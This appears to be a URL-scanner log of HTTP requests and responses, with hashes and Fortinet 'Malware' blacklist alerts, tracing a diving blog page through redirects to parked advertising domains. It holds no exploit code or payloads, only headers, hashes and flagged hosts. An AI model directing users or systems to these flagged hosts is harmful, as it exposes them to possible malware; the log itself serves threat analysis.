Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Sat, 09 Feb 2019 18:21:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    0b396efa63b7f4f3b51f37655492cb85
Sha1:   d0e7ddd7c2b3d28d9772d5e5af8bd130939eb453
Sha256: 36c315cb9db4d9abeb7086959a29dd97cb58252165be412add6dc7efbccd6412

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:39 GMT
Server: Apache
ntCoent-Length: 272
Keep-Alive: timeout=5, max=104
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 196


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   196
Md5:    e0698dae3ade1f5cc1d7614aeaa9939b
Sha1:   e907f8b75f352b87245dd8c3fbec4a29de3d9117
Sha256: 3396aa8f6a541378072f2de22baa11d8728733fa5d9c67a557e319f8afc2e073
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: c11n4.i.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         104.200.23.46
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: openresty/1.13.6.1
Date: Sat, 09 Feb 2019 18:21:39 GMT
Content-Length: 0
Connection: close
Location: http://www12.teaserguide.com/?
Vary: Accept-Language
Content-Language: en
Set-Cookie: mtm_delivered=WyJ0ZWFzZXJndWlkZS5jb20iLCJodHRwOi8vd3d3MTIudGVhc2VyZ3VpZGUuY29tLz8iLDIsIjIwMTktMDItMDkgMTg6MjE6MzkiLG51bGwsODYsbnVsbCxudWxsXQ:1gsXFz:NwHw9KowidVpMcpA_rqMaeYM0X8; expires=Sat, 09-Feb-2019 19:21:39 GMT; Max-Age=3600; Path=/


--- Additional Info ---
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:39 GMT
Server: Apache
ntCoent-Length: 272
Keep-Alive: timeout=5, max=101
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 195


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   195
Md5:    c6462ed23c8cc368bd681226f89ea628
Sha1:   9bcadae0cb0ed0ff9661a5e409dd5120e2b68900
Sha256: 839370a7060ce2aca81cb5add1709bb5c9ce2b3fd8045c7a795d336a02a63499
                                        
                                            GET /? HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Sat, 09 Feb 2019 18:21:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    0b396efa63b7f4f3b51f37655492cb85
Sha1:   d0e7ddd7c2b3d28d9772d5e5af8bd130939eb453
Sha256: 36c315cb9db4d9abeb7086959a29dd97cb58252165be412add6dc7efbccd6412

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: c11n4.i.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         104.200.23.46
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: openresty/1.13.6.1
Date: Sat, 09 Feb 2019 18:21:39 GMT
Content-Length: 0
Connection: close
Location: http://www12.teaserguide.com/?
Vary: Accept-Language
Content-Language: en
Set-Cookie: mtm_delivered=WyJ0ZWFzZXJndWlkZS5jb20iLCJodHRwOi8vd3d3MTIudGVhc2VyZ3VpZGUuY29tLz8iLDIsIjIwMTktMDItMDkgMTg6MjE6MzkiLG51bGwsODYsbnVsbCxudWxsXQ:1gsXFz:NwHw9KowidVpMcpA_rqMaeYM0X8; expires=Sat, 09-Feb-2019 19:21:39 GMT; Max-Age=3600; Path=/


--- Additional Info ---
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:39 GMT
Server: Apache
ntCoent-Length: 272
Keep-Alive: timeout=5, max=103
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 196


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   196
Md5:    e0698dae3ade1f5cc1d7614aeaa9939b
Sha1:   e907f8b75f352b87245dd8c3fbec4a29de3d9117
Sha256: 3396aa8f6a541378072f2de22baa11d8728733fa5d9c67a557e319f8afc2e073
                                        
                                            GET /? HTTP/1.1 
Host: www12.teaserguide.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         185.53.179.29
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Sat, 09 Feb 2019 18:21:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_oneclick
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   475
Md5:    0b396efa63b7f4f3b51f37655492cb85
Sha1:   d0e7ddd7c2b3d28d9772d5e5af8bd130939eb453
Sha256: 36c315cb9db4d9abeb7086959a29dd97cb58252165be412add6dc7efbccd6412

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /?dn=teaserguide.com&pid=9PO755G95 HTTP/1.1 
Host: iyfsearch.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www12.teaserguide.com/?

                                         
                                         208.91.196.46
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:39 GMT
Server: Apache
ntCoent-Length: 271
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 195


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   195
Md5:    5f62cb9ebed164866140c23a2d937b4b
Sha1:   7f7d394afcb1c707080a21f9d0a679ebf50fa3ce
Sha256: df7103af59b870846a48fb84091d754c1e6175e9efc7c370aa4280d4f538cddd
                                        
                                            GET /snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: ww31.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/

                                         
                                         208.91.196.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:39 GMT
Server: Apache
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_ctqP9Z3ebAvSBYsHyTG5upIYfHHXrjOBkzZYoAQ4wJZHgKFztacHI58FjUIjGhKZbVdhNV7mi5KfMmjykfGd2Q==
ntCoent-Length: 2972
Keep-Alive: timeout=5, max=102
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 1708


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1708
Md5:    f952579b686cfe11a688eabfd1f5e51d
Sha1:   308ac8e9a32a888de51a49444fa586b9f5898cf4
Sha256: a9c5cf2c13d0db8f68c3ea79faa44736be18a32a6f665b34abbc5e6adfb5ecc4
                                        
                                            GET /?fp=kuohWSrjMrkqYGWrfeXnUL9FyPeQIuyElga4q1DfkYes3RFE7tH7Ddw%2FfoxnpTtIvpxXvu5SjhulXdTN7fjrfdIM6wtTcjEEb0Ez4rSdeLk%2FrcX6ytN1GADnbt5Y56HvS5L0okpPyWfGt1UGsvnmJiW43IrTQFi2TZSSC32qCDJc%2B2Fg03ICe7QNAFGzTX9%2F&prvtof=xVQdVWqR5NAZabQXy1NVOdeDdoiQ2Lbi%2BJ37LSVvvoIHP8WBdBt7HnfEtbwB1DMkFvdDN%2BUGBnBMXPuT9L2t7sugeN7MBvblc596ZDrYrA4%3D&poru=cyY8HtQ%2Bfyq85eONlncPb8IO%2B08akCvXQpVFPn5hXuqxtes04MI2C1z1O4m0psPEcKaKukgBLUgXEmtN10xo%2FdUqPVEIBzE8viT89l53ZoNI%2BQ5epAgNjAU7AIGt7BfKzQCGm22ElgPU8nxyab2%2F%2BZynbJKowBW5azpiycvl5350OdnxfrEEvu8KwBKYtcRMBTGVFKwt7t%2FwHtIrDPinOQ%3D%3D&default_keyword=WOW%21+What+a+Dive%21+%C2%AB+Go+deep%2C+stay+long&referrer=&se_referrer=&source=www.sjue.com HTTP/1.1 
Host: ww31.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww31.kfc.i.illuminationes.com/snitch?default_keyword=WOW!%20What%20a%20Dive!%20%C2%AB%20Go%20deep%2C%20stay%20long&referrer=&se_referrer=&source=www.sjue.com
Cookie: isframesetenabled=1

                                         
                                         208.91.196.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 18:21:40 GMT
Server: Apache
ntCoent-Length: 271
Keep-Alive: timeout=5, max=125
Connection: Keep-Alive
Cache-Control: private
Content-Encoding: gzip
Content-Length: 195


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   195
Md5:    5f62cb9ebed164866140c23a2d937b4b
Sha1:   7f7d394afcb1c707080a21f9d0a679ebf50fa3ce
Sha256: df7103af59b870846a48fb84091d754c1e6175e9efc7c370aa4280d4f538cddd
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.sjue.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: _ga=GA1.2.799426551.1549736498; _gid=GA1.2.1244124815.1549736498; _gat=1

                                         
                                         64.34.173.227
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Date: Sat, 09 Feb 2019 14:39:33 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 03 Jun 2009 20:48:55 GMT
Etag: "e20529-57e-46b77c9a29bc0"
Accept-Ranges: bytes
Content-Length: 1406
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   1406
Md5:    69a23051d5c85eee3a5159ad87a6fd61
Sha1:   5eb92295b51265bc8d53533d7797488a6eb7b020
Sha256: 6f941a48a171b242b0eff8305faef43d959bdce8907ce4afb4e102a5787db11d
                                        
                                            GET /blog/2008/10/wreck-discovery-on-the-indepencence-ii/ HTTP/1.1 
Host: www.sjue.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.sjue.com/blog/2008/10/wow-what-a-dive/comment-page-1/
X-Moz: prefetch
Cookie: _ga=GA1.2.799426551.1549736498; _gid=GA1.2.1244124815.1549736498; _gat=1

                                         
                                         64.34.173.227
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Sat, 09 Feb 2019 14:39:33 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
X-Pingback: http://www.sjue.com/blog/xmlrpc.php
Link: <http://www.sjue.com/blog/?p=61>; rel=shortlink
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4180
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware